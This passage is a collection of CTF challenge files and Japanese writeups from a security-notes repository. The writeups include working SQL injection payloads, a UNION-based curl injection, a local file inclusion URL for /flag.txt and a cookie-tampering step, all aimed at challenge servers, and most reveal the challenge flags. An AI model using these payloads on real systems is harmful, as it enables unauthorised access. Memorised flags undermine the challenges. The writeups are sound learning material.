"src_encoding": "UTF-8", "text": "Someone very cheeky decided to encrypt their secret message in Google Sheets. What could they be hiding in plain sight?\n\nCurious! 
Click on the link below to find out more:\n\nhttps://docs.google.com/spreadsheets/d/15PFb_fd6xKVIJCF0b0XiiNeilFb-L4jm2uErip1woOM/edit#gid=0" }, { "alpha_fraction": 0.36228814721107483, "alphanum_fraction": 0.8389830589294434, "avg_line_length": 22.600000381469727, "blob_id": "be2f81064dc6a802d2aa2436876561a0cf2e231a", "content_id": "401db04420f3cd29a25701ff9f3c66d3556650e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 223, "num_lines": 40, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下の画像が与えられる。\n\n![](./image.png)\n\n国旗のような部分は 国際信号旗 のマークであることが分かった。\n\n* https://ja.wikipedia.org/wiki/国際信号旗\n\n解読すると、 \n\n```\n011001110110101001110011011011010111011101110011\n011110110011000101111000010111110110111100110001\n011010110101111101111000001101000111000001110010\n010111110110110000110011011110010011010001101010\n011011100011111101111101\nTHEKEYISFHSKDN\n```\n\nとなる。\n\n```py\nfrom Crypto.Util.number import *\nfrom pwn import *\n\nc = b'011001110110101001110011011011010111011101110011011110110011000101111000010111110110111100110001011010110101111101111000001101000111000001110010010111110110110000110011011110010011010001101010011011100011111101111101'\nkey = b'FHSKDN'\n\nprint(long_to_bytes(int(c,2)))\n\n# Vigenere Decode with key FHSKDN\n# \n# https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('FHSKDN')&input=Z2pzbXdzezF4X28xa194NHByX2wzeTRqbj99\n```\n\nバイナリを文字列に変換し、ヴィジュネル暗号で復号化したものがフラグになっていた。\n\n<!-- bcactf{1s_h1s_n4me_g3r4rd?} -->\n" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.8382353186607361, "avg_line_length": 28.14285659790039, "blob_id": "b895998344176dee36cddac082d2e33476b65d8e", "content_id": "7efc961e13cc94b68c66574271eb70f0e0d9e0d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/depixelization/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you depixelize it ?\n\n[depixelization.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/depixelization/depixelization.tar.gz)\n\nbe6484841b5f6086c9f2609fdce5622313308688\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.7164179086685181, "alphanum_fraction": 0.7686567306518555, "avg_line_length": 23.363636016845703, "blob_id": "c5159cc16a9aae4b4427928bfbb01a2f8a14868a", "content_id": "4f38f2da6b3e3023bf5ff6cee1c14de7339adab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 268, "license_type": "no_license", "max_line_length": 127, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/stackoverflow/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWelcome to Stack Overflow! 
Get answers to all your programming questions right here!\n\n**Attachments**\n\n[https://imaginaryctf.org/r/E795-stackoverflow](https://imaginaryctf.org/r/E795-stackoverflow) `nc chal.imaginaryctf.org 42001`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.7028753757476807, "alphanum_fraction": 0.7859424948692322, "avg_line_length": 61.599998474121094, "blob_id": "a3f9cf965c38339d1009cfe08f53d4b52a41a0e7", "content_id": "4f48365bd2a1faed1901e2de5e7efcf15cbf244c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 313, "license_type": "no_license", "max_line_length": 135, "num_lines": 5, "path": "/2021/RaRCTF_2021/unrandompad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Yeah I use randomized padding, it increases security!\n\nNote: This is a part 1 challenge of `randompad`. Take a look at the source for that one and compare the two for a hint on how to solve.\n\n[unrandompad.py - 768eb4](https://files-ctf.rars.win/challenge-files/29/768eb4fff7128eff3f709d9070bf271e/unrandompad.py)\n" }, { "alpha_fraction": 0.300991952419281, "alphanum_fraction": 0.35678860545158386, "avg_line_length": 66.20833587646484, "blob_id": "4642057d0ff86ce0790b8f5d11a8a330364be4b9", "content_id": "9eb86587082e35696f049377b1434a9070e3da22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3230, "license_type": "no_license", "max_line_length": 113, "num_lines": 48, "path": "/2021/WaniCTF21-spring/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WaniCTF'21-spring\n\n* https://score.wanictf.org/#/\n\n* 2021/04/30 10:00 JST — 2021/05/02 20:00 JST\n\n## Official Writeup\n\n* https://github.com/wani-hackase/wanictf21spring-writeup\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------ | ----------------------------- | ----: | -----: |\n| Pwn | [01 netcat](01_netcat) | netcat | 142 | 259 |\n| Misc | [Automaton Lab.](Automaton_Lab) | Rule30 | 262 | 45 |\n| Misc | [binary](binary) | binary to string | 156 | 187 |\n| Crypto | [Can't restore the flag?](Cant_restore_the_flag) | Chinese Remainder Theorem | 207 | 83 |\n| Web | [CloudFront Basic Auth](CloudFront_Basic_Auth) | | 282 | 37 |\n| Crypto | [Easy](Easy) | | 166 | 152 |\n| Web | [exception](exception) | | 186 | 110 |\n| Reversing | [execute](execute) | assembly | 190 | 105 |\n| Crypto | [Extra](Extra) | RSA 2p+q | 219 | 72 |\n| Web | [fake](fake) | DevTools | 136 | 305 |\n| Misc | [Git Master](Git_Master) | docker, git | 217 | 74 |\n| Forensics | [illegal image](illegal_image) | wireshark, ICMP | 271 | 41 |\n| Reversing | [licence](licence) | angr | 285 | 36 |\n| Forensics | [MixedUSB](MixedUSB) | strings | 175 | 131 |\n| Crypto | [OUCS](OUCS) | Okamoto–Uchiyama cryptosystem | 300 | 31 |\n| Forensics | [presentation](presentation) | ppsx | 142 | 258 |\n| Reversing | [secret](secret) | strings | 150 | 210 |\n| Forensics | [secure document](secure_document) | AutoHotKey | 207 | 83 |\n| Crypto | [Simple conversion](Simple_conversion) | int to bytes | 154 | 192 |\n| Forensics | [slow](slow) | Slow Scan television | 274 | 40 |\n| Reversing | [timer](timer) | GDB, change variable\\ | 202 | 89 |\n| Web | [Wani Request 1](Wani_Request_1) | webhook | 148 | 220 |\n| Web | [Wani Request 2](Wani_Request_2) | webhook. 
xss | 250 | 51 |\n| Web | [watch animal](watch_animal) | Blind SQL injection | 219 | 72 |\n\n---\n\n## Result\n\n* 4940 points\n\n* 27 / 353 (> 1 pt)\n" }, { "alpha_fraction": 0.6148936152458191, "alphanum_fraction": 0.721276581287384, "avg_line_length": 19.434782028198242, "blob_id": "da3421764e7f56a6e3ca15efa369d17e2f82e0d4", "content_id": "7d2e9806d4bbc457165a13c9ab766e95671d67c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 670, "license_type": "no_license", "max_line_length": 70, "num_lines": 23, "path": "/2021/BCACTF_2.0/Home_Automation/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49154/ にアクセスする。\n\n![](img/2021-06-13-13-25-15.png)\n\n[Log in as guest] ボタンを押すと Lights の ON/OFF ボタンが表示される。\n\n![](img/2021-06-13-13-26-50.png)\n\nOFFにしようとすると、http://web.bcactf.com:49155/off に飛ばされ、\n\n```\nYou must be admin to turn off the lights. Currently you are \"vampire\".\n```\n\nというメッセージが表示される。\n\nCookie情報を見ると `user=vampire`となっているので、`user=admin`に書き換える。\n\nページを再読み込みするとフラグが表示された。\n\n<!-- bcactf{c00k13s_s3rved_fr3sh_fr0m_th3_smart_0ven_cD7EE09kQ} -->\n" }, { "alpha_fraction": 0.5733557939529419, "alphanum_fraction": 0.5851601958274841, "avg_line_length": 20.178571701049805, "blob_id": "83dfb5f209333942edd498345888b9eb3b2d103d", "content_id": "2a521827aeda7edf8306262b863cafe3c2c4aca9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/2021/SECCON_Beginners_CTF_2021/Logical_SEESAW/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import random, getrandbits\nfrom flag import flag\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\nlength = flag.bit_length()\nkey = getrandbits(length)\nwhile not length == key.bit_length():\n key = getrandbits(length)\n\nflag = list(bin(flag)[2:])\nkey = list(bin(key)[2:])\n\ncipher_L = []\n\nfor _ in range(16):\n cipher = flag[:]\n m = 0.5\n \n for i in range(length):\n n = random()\n if n > m:\n cipher[i] = str(eval(cipher[i] + \"&\" + key[i]))\n \n cipher_L.append(\"\".join(cipher))\n\n\nprint(\"cipher =\", cipher_L)\n" }, { "alpha_fraction": 0.3331211507320404, "alphanum_fraction": 0.6738807559013367, "avg_line_length": 24.96143341064453, "blob_id": "4b2ac90c4df82b1c109ba28d4d845f82514e6a47", "content_id": "2fd6ad0730256acd06a271dfc3fa397271c97d44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9864, "license_type": "no_license", "max_line_length": 136, "num_lines": 363, "path": "/2020/pbctf_2020/GCombo/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n問題のリンク先に飛ぶと、Googleフォームの画面になる。0~9の選択肢があり、選択すれば次に進むことができる。\n\nページのソースを読むと`<script>`タグに以下のような記述がある。\n\n<details><summary>script</summary>\n\n```js\nvar FB_PUBLIC_LOAD_DATA_ = 
[null,[null,[[938169490,null,null,2,[[1420416147,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,1935811336,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,1114266997,null,0]\n,[\"6\",null,1935811336,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,1935811336,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[691517430,null,null,8]\n,[566314179,null,null,2,[[1728367628,[[\"1\",null,1076236325,null,0]\n,[\"2\",null,1076236325,null,0]\n,[\"3\",null,1076236325,null,0]\n,[\"4\",null,1076236325,null,0]\n,[\"5\",null,1076236325,null,0]\n,[\"6\",null,1076236325,null,0]\n,[\"7\",null,1076236325,null,0]\n,[\"8\",null,1076236325,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,1076236325,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1996292448,null,null,8]\n,[255198225,null,null,2,[[810673342,[[\"1\",null,918802994,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,1138684813,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[147720654,null,null,8]\n,[1968136211,null,null,2,[[715448114,[[\"1\",null,311281996,null,0]\n,[\"2\",null,1737460359,null,0]\n,[\"3\",null,1076236325,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,694883742,null,0]\n,[\"7\",null,78472441,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,691517430,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[918802994,null,null,8]\n,[1421773386,null,null,2,[[1855524489,[[\"1\",null,29278772,null,0]\n,[\"2\",null,29278772,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,29278772,null,0]\n,[\"9\",null,29278772,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1094087816,null,null,8]\n,[479285638,null,null,2,[[543826744,[[\"1\",null,147720654,null,0]\n,[\"2\",null,267261990,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,311281996,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,29278772,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,29278772,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[267261990,null,null,8]\n,[968358138,null,null,2,[[1434188549,[[\"1\",null,78472441,null,0]\n,[\"2\",null,78472441,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,78472441,null,0]\n,[\"5\",null,78472441,null,0]\n,[\"6\",null,78472441,null,0]\n,[\"7\",null,78472441,null,0]\n,[\"8\",null,78472441,null,0]\n,[\"9\",null,78472441,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[311281996,null,null,8]\n,[134264431,null,null,2,[[1393438304,[[\"1\",null,691517430,null,0]\n,[\"2\",null,691517430,null,0]\n,[\"3\",null,691517430,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,691517430,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,691517430,null,0]\n,[\"8\",null,29278772,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,691517430,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1138684813,null,null,8]\n,[1618229729,null,null,2,[[1942029415,[[\"1\",null,29278772,null,0]\n,[\"2\",null,29278772,null,0]\n,[\"3\",null,46599266,null,0]\n,[\"4\",null,9188029
94,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,1935811336,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[29278772,null,null,8]\n,[356414873,null,null,2,[[1297001036,[[\"1\",null,311281996,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,311281996,null,0]\n,[\"5\",null,918802994,null,0]\n,[\"6\",null,311281996,null,0]\n,[\"7\",null,311281996,null,0]\n,[\"8\",null,311281996,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,311281996,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[751651474,null,null,8]\n,[766405565,\"Password Please\",null,0,[[1674649702,null,1,null,[[4,301,[\"s3cuR3_p1n_id_2_3v3ry0ne\"]\n,\"Invalid password!\"]\n]\n]\n]\n]\n,[1935811336,null,null,8,null,-3]\n,[1068483333,null,null,2,[[1193056009,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,918802994,null,0]\n,[\"4\",null,918802994,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,918802994,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,918802994,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,918802994,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1114266997,null,null,8]\n,[1155155958,null,null,2,[[203483032,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,918802994,null,0]\n,[\"4\",null,918802994,null,0]\n,[\"5\",null,918802994,null,0]\n,[\"6\",null,918802994,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,1094087816,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,918802994,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1566374398,null,null,8]\n,[1166405465,null,null,2,[[808283334,[[\"1\",null,78472441,null,0]\n,[\"2\",null,78472441,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,78472441,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,1385363611,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,311281996,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1737460359,null,null,8]\n,[1840461575,null,null,2,[[1332022630,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,1996292448,null,0]\n,[\"7\",null,694883742,null,0]\n,[\"8\",null,694883742,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,1076236325,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1076236325,null,null,8]\n,[797867693,null,null,2,[[377985608,[[\"1\",null,267261990,null,0]\n,[\"2\",null,267261990,null,0]\n,[\"3\",null,311281996,null,0]\n,[\"4\",null,267261990,null,0]\n,[\"5\",null,267261990,null,0]\n,[\"6\",null,267261990,null,0]\n,[\"7\",null,267261990,null,0]\n,[\"8\",null,267261990,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,267261990,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[911811804,null,null,8]\n,[519821694,null,null,2,[[375069514,[[\"1\",null,691517430,null,0]\n,[\"2\",null,694883742,null,0]\n,[\"3\",null,694883742,null,0]\n,[\"4\",null,694883742,null,0]\n,[\"5\",null,694883742,null,0]\n,[\"6\",null,267261990,null,0]\n,[\"7\",null,694883742,null,0]\n,[\"8\",null,694883742,null,0]\n,[\"9\",null,694883742,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[46599266,null,null,8]\n,[1390310175,null,null,2,[[1697347835,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,1935811336,null,0]\n,[\"3\",null,1566374398,null,0]\
n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,267261990,null,0]\n,[\"6\",null,1076236325,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,694883742,null,0]\n,[\"0\",null,78472441,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[694883742,null,null,8]\n,[522640729,null,null,2,[[1902611163,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,311281996,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,1935811336,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1385363611,null,null,8,null,-2]\n,[1048798699,null,null,2,[[40272340,[[\"1\",null,918802994,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,694883742,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,911811804,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,751651474,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[78472441,null,null,8]\n,[1849390960,null,null,2,[[200591249,[[\"1\",null,911811804,null,0]\n,[\"2\",null,911811804,null,0]\n,[\"3\",null,311281996,null,0]\n,[\"4\",null,911811804,null,0]\n,[\"5\",null,911811804,null,0]\n,[\"6\",null,911811804,null,0]\n,[\"7\",null,911811804,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,911811804,null,0]\n,[\"0\",null,911811804,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n]\n,[\"Congratulations! The flag is pbctf{\\u003cdigits you got along the way\\u003e_\\u003cpassword\\u003e}\",1,0,0,0]\n,null,null,[0,0]\n,null,null,\"Enter combination code\",48,[null,null,null,null,0]\n,null,null,null,null,[2]\n,[[1,1,1,1,1]\n,1]\n]\n,\"/forms\",\"Combolock PROD\",null,null,null,\"\",null,0,0,null,\"\",0,\"e/1FAIpQLSe7sOTLHmGjmUY3iE6E7QLqeYAZDfQXsiJrz8r-ZcA_4cXNFQ\",0,\"[]\",0,0]\n;\n```\n</details>\n\n<br>\n\n0~9の選択肢があるので、どうやら`FB_PUBLIC_LOAD_DATA_`という変数はフォームの状態遷移を示しているようだ。\n\nこの情報をもとに状態遷移を答えから逆算する。\n\n初期状態:State938169490\n\n終了状態:State751651474\n\n```mermaid\nstateDiagram\n [*] --> State938169490\n State938169490 --> State1114266997:5\n State1114266997 --> State1094087816:8\n State1094087816 --> State147720654:1\n State147720654 --> State1737460359:2\n State1737460359 --> State1996292448:6\n State1996292448 --> State1138684813:9\n State1138684813 --> State46599266:3\n State46599266 --> State1566374398:3\n State1566374398 --> State1385363611:7\n State1385363611 --> State751651474:0\n State751651474 --> [*]\n```\n\n結果的に、`5812693370` と進むと以下のフォームが表示される状態にたどり着く。\n\n![](img/2020-12-05-15-13-40.png)\n\n`Congratulations! 
The flag is pbctf{<digits you got along the way>_<password>}`\n\nパスワードはソースに書いてある通り`s3cuR3_p1n_id_2_3v3ry0ne`なので、先ほどの数字と組み合わせればフラグが得られる。\n\n<!-- pbctf{5812693370_s3cuR3_p1n_id_2_3v3ry0ne} -->\n\n\n" }, { "alpha_fraction": 0.5100671052932739, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 29, "blob_id": "f55929455b5b676a590bc01d47aa27be7b9b5dda", "content_id": "368b03ce343526d374b8376d260182a77da43c08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 149, "license_type": "no_license", "max_line_length": 100, "num_lines": 5, "path": "/2021/BambooFox_CTF_2021/Flag_Checker/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/2021-01-16-17-28-38.png)\n\nauthor: CSY54\n\n[upload.zip](https://ctf.bamboofox.tw/files/b9102b9d65dcbb23fb20fc5442555786/upload.zip?token=eyJ1c2VyX2lkIjoxMDMxLCJ0ZWFtX2lkIjo0NDIsImZpbGVfaWQiOjI2fQ.YAKjvw.QyKq1YfNy_fwj7VQj6GTF1DdWKg)" }, { "alpha_fraction": 0.45681819319725037, "alphanum_fraction": 0.5295454263687134, "avg_line_length": 11.571428298950195, "blob_id": "447b21cc385142f8ef7b080b8f5cac0fc507fae5", "content_id": "8b16769af697318d9421dfe05f53fdb8cd10d900", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 640, "license_type": "no_license", "max_line_length": 56, "num_lines": 35, "path": "/2021/BCACTF_2.0/Movie-Login-3/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49162/ にアクセスする。\n\n`Movie-Login-1`と同様にログイン画面が表示される。\n\n![](img/2021-06-13-15-19-41.png)\n\n問題に添付されているjsonファイルは以下のようになっており、ここに書かれている文字は使えないようになっている。\n\n```json\n[\n \"and\",\n \"1\",\n \"0\",\n \"true\",\n \"false\",\n \"/\",\n \"*\",\n \"=\",\n \"xor\",\n \"null\",\n \"is\",\n \"<\",\n \">\"\n]\n```\n\n`username = admin`, パスワードを以下のようにしたらログインできた。\n\n```\n2' or '3' & '5\n```\n\n<!-- bcactf{gu3ss_th3r3s_n0_st0pp1ng_y0u!} -->\n" }, { "alpha_fraction": 0.6038185954093933, "alphanum_fraction": 0.7088305354118347, "avg_line_length": 27, "blob_id": "7e13e46d5bb7c2cd2d9322181afcd4ecdfe06ce1", "content_id": "f2a37cdc77fd24d27b1cebcb796bf6b7798d8579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 594, "license_type": "no_license", "max_line_length": 93, "num_lines": 15, "path": "/2021/WeCTF_2021/Include/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[http://include.sf.ctf.so/](http://include.sf.ctf.so/) にアクセスすると、以下のようなメッセージが表示される。\n\n![](img/2021-06-20-12-15-28.png)\n\nGETパラメータに 🤯 とあるので、`http://include.sf.ctf.so/?%F0%9F%A4%AF=hoge`のようにして`@include`に任意の文字列を挿入できる。\n\nLocal File Inclusion(LFI) によって`/flag.txt`を読む。\n\n* http://include.sf.ctf.so/?%F0%9F%A4%AF=/flag.txt\n\nにアクセスすると、フラグが表示された。\n\n<!-- we{695ed01b-3d31-46d7-a4a3-06b744d20f4b@1nc1ud3_/etc/passwd_yyds!} -->" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24.200000762939453, "blob_id": "31d54fec4dce264044daca6444de558db1cce7a9", "content_id": "4d8224eb942e3a4d21b36f47a8c39b026689e1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 58, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Pady_McPadface/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "When your message is 99.95% padding, nothing 
can go wrong!\n\nnc chal.cybersecurityrumble.de 34187\n\nAuthor: rugo,manf|RedRocket" }, { "alpha_fraction": 0.6425120830535889, "alphanum_fraction": 0.6772946715354919, "avg_line_length": 26.263158798217773, "blob_id": "e15674ecb3110a2be0e3099d6433137845516351", "content_id": "a368f1fe50d100ee3d4b1aff6d46e3b3e3682632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1345, "license_type": "no_license", "max_line_length": 137, "num_lines": 38, "path": "/2021/angstromCTF_2021/Sea_of_Quills/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`cols`, `limit`, `offset` のPOSTパラメータでクエリを実行する仕組みになっている。\n\n```rb\n@row = db.execute(\"select %s from quills limit %s offset %s\" % [cols, lim, off])\n```\n\nただし、`cols`には`blacklist`の文字が使えず、`limit`,`offset`には数字しか使えない。\n\n```rb\nblacklist = [\"-\", \"/\", \";\", \"'\", \"\\\"\"]\nblacklist.each { |word|\n if cols.include? word\n return \"beep boop sqli detected!\"\n end\n}\n\nif !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)\n return \"bad, no quills for you!\"\nend\n```\n\nUNION句を`cols`に入れて他のテーブルを探す。ソースコードからsqliteが使われていることが分かっているので、`sqlite_master`の`name`を参照する。\n\nUNIONの後半部分の列数は3なので前半部分も3に合わせておく。\n\n```bash\n$ curl https://seaofquills.2021.chall.actf.co/quills -X POST -d \"cols=name,0,0 from sqlite_master union select *&limit=10&offset=0\"\n```\n\n`flagtable`というテーブル名が存在していることが分かったので中身を見る。\n\n```bash\n$ curl https://seaofquills.2021.chall.actf.co/quills -X POST -d \"cols=*,*,* from flagtable union select *&limit=10&offset=0\" > index.html\n```\n\n<!-- actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} -->" }, { "alpha_fraction": 0.6635071039199829, "alphanum_fraction": 0.7867298722267151, "avg_line_length": 18.272727966308594, "blob_id": "51a05ae80b85059dfed0a5d66ebf0a56980a431b", "content_id": "77c317c09a0809e45aef6d7261623f172c3d3fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 88, "num_lines": 11, "path": "/2021/SECCON_Beginners_CTF_2021/GFM/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "* Github Flavored Markdown\n\n* Google Facebook Microsoft\n\n* And...?\n\n[gfm.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/gfm/gfm.tar.gz)\n\n0173234ba9eec065ffdf5ec88aed1e0e829f1038\n\n想定難易度: Easy" }, { "alpha_fraction": 0.7808988690376282, "alphanum_fraction": 0.7865168452262878, "avg_line_length": 58.33333206176758, "blob_id": "0ec74bc36191c611c5288c829c13c6e6ac304986", "content_id": "e863ee5c89e5f5f51d156131e23263ee60449f51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 108, "num_lines": 3, "path": "/2021/BCACTF_2.0/Slightly_Harder_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald's homework is getting trickier. He isn't being given the primes anymore. 
Help him find the plaintext!\n\n[enc.txt](https://objects.bcactf.com/bcactf2/easyFactorRSA/enc.txt)\n" }, { "alpha_fraction": 0.5857142806053162, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 18.964284896850586, "blob_id": "2b39da686164a241cf2ce9983d813d1427ffb637", "content_id": "e11786bcff6be46a6c72779f08ee7ea62ac847af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/2021/SECCON_Beginners_CTF_2021/Field_trip/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import getrandbits\nfrom flag import flag\n\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\nflag = bin(flag)[2:]\nlength = len(flag)\n\nA = 